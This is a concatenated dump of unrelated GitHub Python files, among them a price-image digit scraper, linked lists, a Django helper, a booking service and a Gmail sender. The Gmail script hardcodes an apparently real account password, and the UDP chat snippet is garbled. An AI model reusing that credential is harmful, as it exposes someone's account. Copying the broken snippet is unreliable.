opt_file.write('\\n')\n\n    def parse(self):\n        opt = self.gather_options()\n\n        self.print_options(opt)\n\n        # set gpu ids\n        # str_ids = opt.gpu_ids.split(',')\n        # opt.gpu_ids = []\n        # for str_id in str_ids:\n        #     id = int(str_id)\n        #     if id >= 0:\n        #         opt.gpu_ids.append(id)\n        # if len(opt.gpu_ids) > 0:\n        #     torch.cuda.set_device(opt.gpu_ids[0])\n\n        self.opt = opt\n        return self.opt","repo_name":"v-vietlq4/thesis","sub_path":"options/base_options.py","file_name":"base_options.py","file_ext":"py","file_size_in_byte":3765,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"}
+{"seq_id":"9817171622","text":"from PIL import Image\r\nimport numpy as np\r\nimport requests as req\r\nfrom io import BytesIO\r\n\r\ndef read_image(imageName):\r\n    im = Image.open(imageName).convert('RGB')\r\n    data = np.array(im)\r\n    return data\r\n\r\ndef read_image_url(img_url):\r\n    response = req.get('http://'+img_url)\r\n    im = Image.open(BytesIO(response.content)).convert('RGB')\r\n    data = np.array(im)\r\n    return data\r\n\r\ndef get_num(n):\r\n    l_num = []\r\n    m = 0\r\n    x = n\r\n    while True:\r\n        if m < 9:\r\n            x0,x1, = np.split(x, [30],axis = 1)\r\n            #print(x0)\r\n            #plt.imshow(x0)\r\n            #plt.pause(0.001)\r\n            #print(x1)\r\n            #plt.imshow(x1)\r\n            #plt.pause(0.001)\r\n            l_num.append(x0)\r\n            x = x1\r\n            m+=1\r\n            continue\r\n        else:\r\n            l_num.append(x)\r\n            #plt.imshow(x)\r\n            #plt.pause(0.001)\r\n            break\r\n    return l_num\r\n\r\ndef get_0_9():\r\n    l_num = get_num(read_image('3.png'))\r\n    x2,x4,x3,x6,x8,x5,x1,x9,x0,x7 = l_num\r\n    list_num = [x0,x1,x2,x3,x4,x5,x6,x7,x8,x9]\r\n    return list_num\r\n\r\ndef get_num_list(png):\r\n    l = []\r\n    list_num = get_0_9()\r\n    l_num_test = get_num(read_image_url(png))\r\n    for i in range(0,10):\r\n        #plt.imshow(l_num_test[i])\r\n        #plt.pause(0.001)\r\n        for w in range(0,10):\r\n            #print((i == w).all())\r\n            if (l_num_test[i] == list_num[w]).all():\r\n                #plt.imshow(w)\r\n                #plt.pause(0.001)\r\n                l.append(w)\r\n                #print(w)\r\n                break\r\n    #print (l)\r\n    return l\r\n\r\na = get_num_list('static8.ziroom.com/phoenix/pc/images/price/e1b89727400c2b61fe1018661fada079s.png')\r\nprint(a)","repo_name":"DingDang56/spider-spider","sub_path":"myset/scrapy框架/img.py","file_name":"img.py","file_ext":"py","file_size_in_byte":1706,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"12292818800","text":"# -*- coding: utf-8 -*-\nimport os\nimport shutil #文件移动,拷贝等操作所需要的modul\n\nphoto_path_list = []\nwith open(\"photo.txt\", \"r\") as photo_path:\n\tfor i in photo_path:\n\t\tphoto_path_list.append(i[:-1])\n\nclass_list = []\nwith open(\"result_new.txt\", \"r\") as result:\n\tfor i in result:\n\t\tresult_dict = eval(i) #将字符型i转化为class型,并赋值给result_dict字典\n\t\tif \"data\" in result_dict:\n\t\t\tdata_dict = result_dict[\"data\"]\n\t\t\tclass_list.append(data_dict[\"cluster_id\"])\n\t\telse:\n\t\t\tclass_list.append(\"0\")\n\nfor i in range(3929):\n\tph_path = os.path.join('/Users/pangweidong/Desktop/store_as_needed', str(photo_path_list[i]))\n\timage_name = os.path.basename(ph_path)\n\tcl_path = os.path.join('/Users/pangweidong/Desktop/store_as_needed', str(class_list[i]), image_name)\n\tshutil.copy(ph_path, cl_path)\n \n#根据给定的photo.txt和result_new.txt两个文件中的内容进行文件分类操作。\n","repo_name":"password442619/Python_Script","sub_path":"store_as_needed.py","file_name":"store_as_needed.py","file_ext":"py","file_size_in_byte":915,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"7102388483","text":"budget = float(input())\nflour_price = float(input())\negg_price = flour_price * 0.75\nmilk_price = flour_price * 1.25\nloafs = 0\neggs = 0\nloaf_price = flour_price + egg_price + (0.25 * milk_price)\nwhile budget - loaf_price > 0:\n loafs += 1\n eggs += 3\n if loafs % 3 == 0:\n eggs -= (loafs - 2)\n budget -= loaf_price\nprint(f\"You made {loafs} loaves of Easter bread! Now you have {eggs} eggs and {budget:.2f}BGN left.\")\n","repo_name":"domenikodetchev/soft-uni-courses","sub_path":"Programming-Fundamentals-Python/easter_bread.py","file_name":"easter_bread.py","file_ext":"py","file_size_in_byte":432,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"4294787149","text":"from threading import Thread\nfrom socket import *\n\n#1.sendmsg\ndef sendmsg():\n\twhile True:\n\t\ts_msg = input('<>%s:%s'%(str(r_msg[1]).encode('utf-8'), r_msg[0]))\n\nudpSocket = None\ns_port = 0\ns_ip = ''\n\n#3.main()\ndef main():\n\tglobal udpsocket\n\tglobal s_ip\n\tglobal s_port\n\n\ts_ip = input('< (self.length()-1):\n self.append(item)\n # 找到指定位置\n else:\n node = SingleNode(item)\n count = 0\n # pre用来指向指定位置pos的前一个位置pos-1,初始从头节点开始移动到指定位置\n pre = self._head\n while count < (pos-1):\n count += 1\n pre = pre.next\n # 先将新节点node的next指向插入位置的节点\n node.next = pre.next\n # 将插入位置的前一个节点的next指向新节点\n pre.next = node\n\n def remove(self, item):\n \"\"\"删除一个节点\"\"\"\n # 若链表为空,则直接返回\n if self.is_empty():\n return\n # 将cur指向头节点\n cur = self._head\n pre = None\n # 若头节点的元素就是要查找的元素item\n if cur.item == item:\n # 如果链表不止一个节点\n if cur.next != self._head:\n # 先找到尾节点,将尾节点的next指向第二个节点\n while cur.next != self._head:\n cur = cur.next\n # cur指向了尾节点\n cur.next = self._head.next\n self._head = self._head.next\n else:\n # 链表只有一个节点\n self._head = None\n else:\n pre = self._head\n # 第一个节点不是要删除的\n while cur.next != self._head:\n # 找到了要删除的元素\n if cur.item == item:\n # 删除\n pre.next = cur.next\n return\n else:\n pre = cur\n cur = cur.next\n # cur 指向尾节点\n if cur.item == item:\n # 尾部删除\n pre.next = cur.next\n\n def get(self, i):\n # 获取i处的元素\n if i < 0 or self.is_empty():\n return -1\n\n cur = self._head\n cur_index = 0\n while cur is not self._head:\n if cur_index == i:\n return cur.item\n\n cur_index += 1\n cur = cur.next\n\n return -1\n\n def search(self, item):\n \"\"\"查找节点是否存在\"\"\"\n if self.is_empty():\n return False\n 
cur = self._head\n if cur.item == item:\n return True\n while cur.next != self._head:\n cur = cur.next\n if cur.item == item:\n return True\n return False\n\n\n","repo_name":"huageyiyangdewo/learn_algorithm","sub_path":"linear/singlecyclelinklist.py","file_name":"singlecyclelinklist.py","file_ext":"py","file_size_in_byte":5070,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"25889071405","text":"import numpy as np\nimport pyefd\nimport cv2\nimport os\nfrom code.modules import datasets\n\nMNIST_DATA = os.getcwd() + '/mnist'\nFOURIER_ORDER = 20\nRAND_SEED = 0\n \n# transform function\ndef transform_train(img):\n raster = np.asarray(img) # convert PIL image to numpy array for openCV\n ret, raster = cv2.threshold(raster, 100, 255, cv2.THRESH_BINARY) # binarize image\n contours, hierarchy = cv2.findContours(raster, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE) # find outer contour of objects (digit) in image\n \n # since some images have artifacts disconnected from the digit, extract only\n # largest contour from the contour list (this should be the digit)\n contour_lens = [len(contour) for contour in contours]\n largest_index = contour_lens.index(max(contour_lens))\n\n # get translation and rotation offsets\n contour = np.squeeze(contours[largest_index])\n sketch_center = pyefd.calculate_dc_coefficients(contour)\n coeffs = pyefd.elliptic_fourier_descriptors(contour, order=FOURIER_ORDER, normalize=True)\n return coeffs\n\n# create train, eval, and test datasets\ntrain_data = datasets.MNIST_VAL(root=MNIST_DATA, train=True, val=False, download=True, transform=transform_train)\n\n# load dataset\nfourier_descriptors = []\nfor (img,label) in train_data:\n fourier_descriptors.append(img)\n\nfourier_descriptors = np.stack(fourier_descriptors)\nmean = np.mean(fourier_descriptors, axis=0)\nstdev = np.std(fourier_descriptors, axis=0)\nprint(np.array2string(mean, separator=', '))\nprint('-----------------------------------')\nprint(np.array2string(stdev, separator=', '))\n","repo_name":"mjwats10/fourier-robustness","sub_path":"code/utils/mnist_mean_stdev_calc.py","file_name":"mnist_mean_stdev_calc.py","file_ext":"py","file_size_in_byte":1588,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74075379254","text":"from django.shortcuts import render, redirect\nfrom django.contrib import messages\nfrom django.conf import settings\n\ndef get_prev_url(request,default):\n try:\n url = request.GET.get('back').replace('///','&')\n except:\n url = default\n return url\n\ndef create_prev_url(request):\n try:\n url = request.get_full_path().replace('&','///')\n except:\n url = '/'\n return url\n\ndef check_permission(request,perm,prev_url,modal=False):\n if not request.user.is_authenticated:\n messages.add_message(request, messages.ERROR, 'Please login first')\n if modal: return redirect('%s?next=%s&modal=Y' % (settings.LOGIN_URL, request.path))\n return redirect('%s?next=%s' % (settings.LOGIN_URL, request.path))\n if not request.user.has_perm(perm):\n messages.add_message(request, messages.ERROR, 'Operations not permitted')\n return redirect(prev_url)\n return False\n\ndef check_fk(request,fk,model,prev_url,modal=False):\n try:\n robj = model.objects.get(pk=fk)\n except:\n messages.add_message(request, messages.ERROR, 'Data not found')\n if modal : return render(request,\"ui/message_only.html\")\n return redirect(prev_url)\n if robj.c_nikappr == '':\n messages.add_message(request, messages.ERROR, 
'Data must be approved')\n if modal : return render(request,\"ui/message_only.html\")\n return redirect(prev_url)\n return False\n","repo_name":"izzwl/nest","sub_path":"authnest/helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":1435,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"197174624","text":"# *coding:utf-8 *\n# 在猪舍原图上判断两条射线是否与标签相交\n# 用两条夹角90°的射线切割图像,确保切割出的块中猪只完整,从而确定鱼眼展开的水平角fi\n# 对每条射线计算和图像边缘线段的交点\n# 暂时只支持处理长宽相等的图像\nimport os\nimport cv2\nimport copy\nimport mmcv\nimport math\nimport numpy as np\nfrom shapely.geometry import LineString\nfrom shapely.geometry import Polygon\nfrom sympy import symbols, Eq, solve\nfrom utils.unfold import project_unfold_fast\n\n# ann_info = mmcv.load('D:/data/20220606092038/annotations/val.json')\n# ann_info = mmcv.load('D:/data/20220617180937/train_via/via_region_data.json')\n# img_dir = 'D:/data/20220606092038/val/'\n# save_dir = 'D:/data/0609/val_step_1/'\n# unfold_dir = 'D:/data/0609/black_unfold/'\n\n\n# 鱼眼相机内参矩阵\nK = np.array([[581.1058307906718, 0.0, 955.5987388116735],\n [0.0, 579.8976865646564, 974.0212406615763], [0.0, 0.0, 1.0]])\n# 鱼眼相机畸变系数\nD = np.array([-0.015964497003735242, -0.002789473611910958,\n 0.005727838947159351, -0.0025185770227346576])\n\nK_1080 = np.array([[326.872, 0.0, 537.524], [0.0, 326.192, 547.887],\n [0.0, 0.0, 1.0]])\n\n\n# 求二维平面两个向量顺时针夹角\ndef clockwise_angle(v1, v2):\n x1, y1 = v1\n x2, y2 = v2\n # dot = |v1| * |v2| * cos(theta)\n dot = x1 * x2 + y1 * y2\n # cross = |v1| * |v2| * sin(theta)\n cross = x1 * y2 - y1 * x2\n # 用arctan是考虑到其值域是[-pi, pi]\n theta = np.arctan2(cross, dot)\n theta = theta if theta > 0 else 2 * np.pi + theta\n return math.degrees(theta)\n\n\ndef via_item_auto_unfold(\n item,\n img_dir,\n unfold_dir=None,\n cut_dir=None,\n ori_dir=None,\n status_D=True,\n draw_lines=False,\n test_single_image=False\n):\n img = cv2.imread(os.path.join(img_dir, item[1]['filename']))\n w = img.shape[1]\n h = img.shape[0]\n r = int(96 / 1920 * w + 0.5)\n\n # 测试单张图片\n if test_single_image:\n if item[1]['filename'] != test_single_image:\n return None, None\n\n polygon = []\n for pig in item[1]['regions']:\n if pig['region_attributes']['type'] != 'pig':\n continue\n point_lst = []\n for point in zip(pig['shape_attributes']['all_points_x'],\n pig['shape_attributes']['all_points_y']):\n point_lst.append(point)\n polygon.append(Polygon(point_lst))\n\n # 右 下 左 上\n # 对应鱼眼展开的水平角\n # 315-360,0-45 45-135 135-225 225-315\n direct = [h, w, h, w]\n # 记录每条线的选择状态\n line_status = []\n # 对每条线坐标进行记录\n line_record = []\n # 镜头每条边上线的个数\n line_num = []\n # 图像中心点坐标\n center = [int(w / 2.0 + 0.5), int(h / 2.0 + 0.5)]\n for idx, length in enumerate(direct):\n cnt = 0\n for i in range(0, length, 40):\n if idx == 0:\n point = (w, i)\n elif idx == 1:\n point = (length - i, h)\n elif idx == 2:\n point = (0, length - i)\n elif idx == 3:\n point = (i, 0)\n cnt += 1\n x, y, k, b = symbols('x y k b')\n eqs = [\n Eq((x - center[0]) ** 2 + (y - center[1]) ** 2, r ** 2),\n Eq(k * center[0] + b, center[1]),\n Eq(k * point[0] + b, point[1]),\n Eq(k * x + b, y)\n ]\n try:\n s1, s2 = solve(eqs, [x, y, k, b])\n s1 = (s1[0].evalf(), s1[1].evalf())\n s2 = (s2[0].evalf(), s2[1].evalf())\n # 无k值,直线垂直x轴\n except Exception as e:\n s1 = (center[0], center[1] - r)\n s2 = (center[0], center[1] + r)\n if max(point[0], center[0]) >= s1[0] >= min(point[0],\n center[0]) and max(\n point[1], center[1]) >= s1[1] >= min(point[1], center[1]):\n circle_point = [s1[0], s1[1]]\n else:\n 
circle_point = [s2[0], s2[1]]\n circle_point = [int(circle_point[0] + 0.5),\n int(circle_point[1] + 0.5)]\n line = LineString([circle_point, point])\n flag = 0\n for pig in polygon:\n if line.intersects(pig):\n flag = 1\n break\n if flag:\n if draw_lines:\n img = cv2.line(img, circle_point, point, (0, 0, 255), 2)\n line_status.append(1)\n else:\n if draw_lines:\n img = cv2.line(img, circle_point, point, (0, 255, 0), 2)\n line_status.append(0)\n line_record.append([circle_point, point])\n line_num.append(cnt)\n for i in range(1, 4):\n line_num[i] = line_num[i - 1] + line_num[i]\n is_ring = 0\n if line_status[0] == line_status[-1] == 1:\n is_ring = 1\n\n # 线的总数\n line_sum = len(line_status)\n cluster_info = []\n ori_img = copy.copy(img)\n\n is_used = {}\n # 暂时只支持处理长宽相等的图像\n cluster_max_num = int((w + 1) / 40) - 1\n # 0°展开点表示的向量\n v0 = [center[0], 0]\n # 避免重复的展开角度\n unfold_angle = {}\n # 角度:展开区域Polygon\n polygon = {}\n # 有环,需要对环特判\n if is_ring:\n ring_start = line_sum - 1\n ring_end = 0\n is_used[0] = 1\n is_used[line_sum - 1] = 1\n for i in range(line_sum - 2, 0, -1):\n if line_status[i] == 1 and i not in is_used:\n is_used[i] = 1\n ring_start = i\n else:\n break\n for i in range(1, line_sum - 1):\n if line_status[i] == 1 and i not in is_used:\n is_used[i] = 1\n ring_end = i\n else:\n break\n len_ring = line_sum - ring_start + ring_end + 1\n success = 0\n # 环可用\n if len_ring <= cluster_max_num:\n start_line = ring_end + 1\n end_line = line_sum - (cluster_max_num - ring_end - 1) - 1\n while end_line != ring_start:\n if line_status[start_line] == line_status[end_line] == 0:\n success = 1\n break\n start_line = start_line + 1\n end_line = end_line + 1\n if success:\n # print(\"ring success:\", start_line, end_line, item[1]['filename'])\n color = (np.random.randint(256), np.random.randint(180),\n np.random.randint(180))\n if draw_lines:\n img = cv2.line(img, line_record[start_line][0],\n line_record[start_line][1], color, 2)\n img = cv2.line(img, line_record[end_line][0],\n line_record[end_line][1], color, 2)\n\n points = [line_record[end_line][1], line_record[end_line][0]]\n idx = (end_line + 1) % line_sum\n for i in range(cluster_max_num):\n points.append(line_record[idx][0])\n idx = (idx + 1) % line_sum\n points.extend(\n [line_record[start_line][0], line_record[start_line][1], [w, h],\n [0, h], [0, 0]])\n points = np.array(points)\n ring_img = copy.copy(img)\n ring_img = cv2.fillPoly(ring_img, [points], (0, 0, 0))\n\n v1 = [line_record[end_line][1][0] - center[0],\n line_record[end_line][1][1] - center[1]]\n angle = (int(clockwise_angle(v0, v1) + 0.5) + 45) % 360\n if w == 1080 and angle not in unfold_angle:\n unfold_angle[angle] = 1\n polygon[angle] = Polygon(\n [[0, 0], [w, 0], [w, h], [0, h], [0, 0]]).difference(\n Polygon(points))\n if unfold_dir is not None:\n cv2.imwrite(\n os.path.join(\n unfold_dir,\n item[1]['filename'].split('.')[0] + '_' +\n str(angle) + '.' + item[1]['filename'][-3:]\n ),\n project_unfold_fast(\n 1080, 1080, K_1080, D, 50, angle, 90, ring_img,\n 100, status_D\n )\n )\n elif w == 1920 and angle not in unfold_angle:\n unfold_angle[angle] = 1\n polygon[angle] = Polygon(\n [[0, 0], [w, 0], [w, h], [0, h], [0, 0]]).difference(\n Polygon(points))\n if unfold_dir is not None:\n cv2.imwrite(\n os.path.join(\n unfold_dir,\n item[1]['filename'].split('.')[0] + '_' +\n str(angle) + '.' 
+ item[1]['filename'][-3:]\n ),\n project_unfold_fast(\n 1080, 1080, K, D, 50, angle, 90, ring_img,\n 100, status_D\n )\n )\n # 无环,按数组处理\n # flag 0 非簇状态 1 簇状态 用于确定簇的开始结束位置\n flag = 0\n cnt = 0\n for idx, status in enumerate(line_status):\n # 找到簇起始位,重置计数器,状态符变为簇状态\n if status == 1 and flag == 0 and idx not in is_used:\n flag = 1\n cnt = 1\n is_used[idx] = 1\n start = idx\n # 在簇中,计数器加1\n elif status == 1 and flag == 1 and idx not in is_used:\n is_used[idx] = 1\n cnt += 1\n # 簇在上一位结束,状态变为非簇\n elif status == 0 and flag == 1:\n flag = 0\n end = idx - 1\n cluster_info.append((start, end))\n # 对图片中所有簇进行遍历,找出所有满足限制的簇\n # 簇的视场角固定为90°,以1920*1920间隔40像素为例,一簇最大为47根线,共展开49根线内的栏位\n for idx, info in enumerate(cluster_info):\n start = info[0]\n end = info[1]\n cluster_len = end - start + 1\n # 满足要求的簇\n if cluster_len <= cluster_max_num:\n start_line = (end + 1) % line_sum\n end_line = start - (cluster_max_num - cluster_len) - 1\n if end_line < 0:\n end_line = line_sum + end_line\n success = 0\n while end_line != start:\n if line_status[start_line] == line_status[end_line] == 0:\n success = 1\n break\n start_line = (start_line + 1) % line_sum\n end_line = (end_line + 1) % line_sum\n if success:\n # print(\"idx: \", idx, start_line, end_line)\n color = (np.random.randint(256), np.random.randint(180),\n np.random.randint(180))\n if draw_lines:\n img = cv2.line(img, line_record[start_line][0],\n line_record[start_line][1], color, 2)\n img = cv2.line(img, line_record[end_line][0],\n line_record[end_line][1], color, 2)\n\n extend_lst = []\n # ring(不会出现,已经单独处理)或者正好在315°-45°\n if start_line <= line_num[0]:\n extend_lst = [[w, h], [0, h], [0, 0]]\n elif start_line <= line_num[1]:\n extend_lst = [[0, h], [0, 0], [w, 0]]\n elif start_line <= line_num[2]:\n extend_lst = [[0, 0], [w, 0], [w, h]]\n elif start_line <= line_num[3]:\n extend_lst = [[w, 0], [w, h], [0, h]]\n points = [line_record[end_line][1], line_record[end_line][0]]\n idx = (end_line + 1) % line_sum\n for i in range(cluster_max_num):\n points.append(line_record[idx][0])\n idx = (idx + 1) % line_sum\n points.extend(\n [line_record[start_line][0], line_record[start_line][1]])\n points.extend(extend_lst)\n points = np.array(points)\n line_img = copy.copy(img)\n line_img = cv2.fillPoly(line_img, [points], (0, 0, 0))\n\n v1 = [line_record[end_line][1][0] - center[0],\n line_record[end_line][1][1] - center[1]]\n angle = (int(clockwise_angle(v0, v1) + 0.5) + 45) % 360\n if w == 1080 and angle not in unfold_angle:\n unfold_angle[angle] = 1\n polygon[angle] = Polygon(\n [[0, 0], [w, 0], [w, h], [0, h], [0, 0]]).difference(\n Polygon(points))\n if unfold_dir is not None:\n cv2.imwrite(\n os.path.join(\n unfold_dir,\n item[1]['filename'].split('.')[0] + '_' +\n str(angle) + '.' + item[1]['filename'][-3:]),\n project_unfold_fast(1080, 1080, K_1080, D, 50,\n angle, 90, line_img, 100,\n status_D)\n )\n elif w == 1920 and angle not in unfold_angle:\n unfold_angle[angle] = 1\n polygon[angle] = Polygon(\n [[0, 0], [w, 0], [w, h], [0, h], [0, 0]]).difference(\n Polygon(points))\n if unfold_dir is not None:\n cv2.imwrite(\n os.path.join(\n unfold_dir,\n item[1]['filename'].split('.')[0] + '_' +\n str(angle) + '.' 
+ item[1]['filename'][-3:]\n ),\n project_unfold_fast(\n 1080, 1080, K, D, 50, angle, 90, line_img,\n 100, status_D\n )\n )\n if ori_dir is not None:\n cv2.imwrite(os.path.join(ori_dir, item[1]['filename']), ori_img)\n if cut_dir is not None:\n cv2.imwrite(os.path.join(cut_dir, item[1]['filename']), img)\n return unfold_angle.keys(), polygon\n\n\nif __name__ == '__main__':\n for item in mmcv.track_iter_progress(ann_info.items()):\n unfold_angle_key, polygon = \\\n via_item_auto_unfold(\n item,\n 'D:/data/20220617180937/train/',\n unfold_dir='./',\n draw_lines=True,\n test_single_image='BYZ_1626763099525.jpg'\n )\n print(unfold_angle_key)\n # via_item_auto_unfold(item, 'D:/data/20220606092038/val/',\n # 'D:/data/0609/black_unfold/', draw_lines=True)\n","repo_name":"zyan-repository/fisheye2side","sub_path":"auto_unfold.py","file_name":"auto_unfold.py","file_ext":"py","file_size_in_byte":15225,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"7822154557","text":"class Node:\n def __init__(self, value):\n self.value = value\n self.next = None\n\n\nclass List:\n def __init__(self):\n self.first = None\n\n\ndef create_list():\n new_list = List()\n new_list.first = create_list_rec()\n return new_list\n\n\ndef create_list_from_list(l):\n new_list = List()\n new_list.first = create_list_from_list_rec(l)\n return new_list\n\n\ndef create_list_from_list_rec(l):\n if len(l) == 0:\n return None\n\n else:\n x = l[0]\n node = Node(x)\n node.next = create_list_from_list_rec(l[1:])\n return node\n\n\ndef create_list_rec():\n x = int(input(\"x=\"))\n\n if x == 0:\n return None\n\n else:\n node = Node(x)\n node.next = create_list_rec()\n return node\n\n\ndef print_list(input_list):\n print_list_rec(input_list.first)\n\n\ndef print_list_rec(node):\n if node != None:\n print(node.value)\n print_list_rec(node.next)\n\n\ndef concatenate(list1_first, list2_first):\n new_list = List()\n new_list.first = concatenate_rec(list1_first, list2_first)\n\n return new_list\n\n\ndef concatenate_rec(node1, node2):\n if node1 is None and node2 is None:\n return None\n\n if node1 is not None:\n temp_node = Node(node1.value)\n temp_node.next = concatenate_rec(node1.next, node2)\n return temp_node\n\n if node2 is not None:\n temp_node = Node(node2.value)\n temp_node.next = concatenate_rec(node1, node2.next)\n return temp_node\n\n\ndef substitute(input_list, element, substitute_list):\n new_list = List()\n new_list.first = substitute_rec(\n input_list.first,\n element,\n substitute_list.first\n )\n\n return new_list\n\n\ndef substitute_rec(node, element, substitute_node):\n if node is None:\n return None\n\n if node.value == element:\n next_substituted = substitute_rec(node.next, element, substitute_node)\n new_list = concatenate(substitute_node, next_substituted)\n\n return new_list.first\n\n temp_node = Node(node.value)\n next_node = node.next\n return concatenate(temp_node, substitute_rec(next_node, element, substitute_node)).first\n\n\ndef get_last_element(input_list):\n last_element = get_last_element_rec(input_list.first)\n return last_element\n\n\ndef get_last_element_rec(node):\n if node is None:\n return None\n\n if node.next is None:\n return node.value\n\n return get_last_element_rec(node.next)\n\n\ndef main():\n l1 = create_list_from_list([3, 2, 1, 2])\n l2 = create_list_from_list([9, 9])\n\n # con = concatenate(l1.first, l2.first)\n # print_list(con)\n\n sub = substitute(l1, 2, l2)\n print(\"Substituted list: \")\n print_list(sub)\n\n last_element = 
get_last_element(l1)\n print(f\"\\nLast element: {last_element}\")\n\n\nmain()\n","repo_name":"caprapaul/assignments","sub_path":"semester_3/pfl/r1/lista.py","file_name":"lista.py","file_ext":"py","file_size_in_byte":2792,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"75047595893","text":"senha = 'Blue123'\nleitura = ''\nerros = 0\n\nwhile (leitura != senha):\n leitura = input('Digite a senha: ')\n if leitura == senha:\n print('Acesso liberado')\n else:\n erros += 1\n print('Senha incorreta, digite novamente!')\n\nprint(f'Você errou a senha {erros} vezes!')","repo_name":"danmachinez/Blue_Mod1","sub_path":"Aula04/Leitura de senha.py","file_name":"Leitura de senha.py","file_ext":"py","file_size_in_byte":292,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"34664273743","text":"\"\"\"empty message\n\nRevision ID: 6e516be39982\nRevises: 219a462be2e3\nCreate Date: 2021-03-17 15:07:36.548592\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = \"6e516be39982\"\ndown_revision = \"219a462be2e3\"\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table(\n \"roles\",\n sa.Column(\"name\", sa.String(length=50), nullable=False),\n sa.PrimaryKeyConstraint(\"name\"),\n )\n op.add_column(\"users\", sa.Column(\"_role\", sa.String(length=50), nullable=True))\n op.create_foreign_key(None, \"users\", \"roles\", [\"_role\"], [\"name\"])\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_constraint(None, \"users\", type_=\"foreignkey\")\n op.drop_column(\"users\", \"_role\")\n op.drop_table(\"roles\")\n # ### end Alembic commands ###\n","repo_name":"Diverso-NVR/NVR","sub_path":"backend/migrations/versions/6e516be39982_.py","file_name":"6e516be39982_.py","file_ext":"py","file_size_in_byte":962,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"18228443850","text":"from gmail import GMail, Message\nfrom datetime import datetime\nfrom threading import Timer\n\n\nx=datetime.today()\ny=x.replace(day=x.day+7, hour=7, minute=0, second=0, microsecond=0)\ndelta_t=y-x\n\nsecs=delta_t.seconds+1\n\ngmail = GMail('dgtran1995@gmail.com', 'Gagaga1995')\nmsg = Message('Xin nghi om', to=\"dennis_1328@yahoo.com.vn\", text=\"Thich thi nghi thoi\")\n\ngmail.send(msg)\n","repo_name":"Dennisdoug/trandangdung-labs-c4e15","sub_path":"Lab 1/Homework/email7am.py","file_name":"email7am.py","file_ext":"py","file_size_in_byte":374,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"38294418061","text":"from datetime import date\n\nfrom sqlalchemy import (\n and_,\n delete,\n func,\n insert,\n or_,\n select,\n)\n\nfrom app.bookings.models import Bookings\nfrom app.database import session_maker\nfrom app.rooms.models import Rooms\nfrom app.service.base import BaseService\n\n\nclass BookingsService(BaseService):\n model = Bookings\n\n @classmethod\n async def add(\n cls, user_id: int, room_id: int, check_in_date: date, check_out_date: date\n ):\n async with session_maker() as session:\n booked_rooms = (\n select(Bookings)\n .where(\n and_(\n Bookings.room_id == room_id,\n or_(\n and_(\n Bookings.check_in_date >= check_out_date,\n Bookings.check_in_date <= check_out_date,\n ),\n 
and_(\n Bookings.check_in_date <= check_out_date,\n Bookings.check_out_date > check_in_date,\n ),\n ),\n )\n )\n .cte(\"booked_rooms\")\n )\n\n get_rooms_left = (\n select(\n (Rooms.rooms_quantity - func.count(booked_rooms.c.room_id)).label(\n \"rooms_left\"\n )\n )\n .select_from(Rooms)\n .join(booked_rooms, booked_rooms.c.room_id == Rooms.id, isouter=True)\n .where(Rooms.id == 1)\n .group_by(Rooms.rooms_quantity, booked_rooms.c.room_id)\n )\n\n rooms_left = await session.execute(get_rooms_left)\n rooms_left: int = rooms_left.scalar()\n\n if rooms_left > 0:\n get_price = select(Rooms.price).filter_by(id=room_id)\n price = await session.execute(get_price)\n price: int = price.scalar()\n add_booking = (\n insert(Bookings)\n .values(\n room_id=room_id,\n user_id=user_id,\n check_in_date=check_in_date,\n check_out_date=check_out_date,\n price=price,\n )\n .returning(Bookings)\n )\n\n new_booking = await session.execute(add_booking)\n await session.commit()\n return new_booking.scalar()\n else:\n return None\n\n @classmethod\n async def delete(cls, user_id: int, booking_id: int):\n async with session_maker() as session:\n query = delete(Bookings).filter_by(id=booking_id, user_id=user_id)\n await session.execute(query)\n await session.commit()\n","repo_name":"drwalther/booking_app","sub_path":"app/bookings/service.py","file_name":"service.py","file_ext":"py","file_size_in_byte":2908,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"38240389413","text":"import asyncio, math\r\nimport sys\r\nfrom datetime import datetime\r\nfrom ib_insync import *\r\nfrom PyQt5.QtCore import QTimer, Qt\r\nfrom PyQt5.QtWidgets import QApplication, QMainWindow, QTableWidget, QTableWidgetItem, QVBoxLayout, QWidget, QLineEdit, QPushButton, QMenu, QAction, QComboBox\r\nfrom PyQt5.QtGui import QColor, QBrush\r\nimport qdarktheme\r\nfrom datetime import date\r\nimport finviz\r\nfrom finvizfinance.group.overview import Overview\r\nimport webbrowser\r\nimport concurrent.futures\r\nimport functools\r\nfrom concurrent.futures import ThreadPoolExecutor\r\nimport yfinance as yf\r\nfrom bs4 import BeautifulSoup\r\nimport pytz, requests\r\nfrom fractions import Fraction\r\n\r\n# Conectarse a la API de TWS\r\nib = IB()\r\nib.connect('127.0.0.1', 7497, clientId=1)\r\n\r\n\r\nclass MarketDataWindow(QMainWindow):\r\n def __init__(self):\r\n super().__init__()\r\n self.current_symbols = set() # Símbolos actuales en la tabla\r\n\r\n # Aplicar el estilo QDarkStyle\r\n 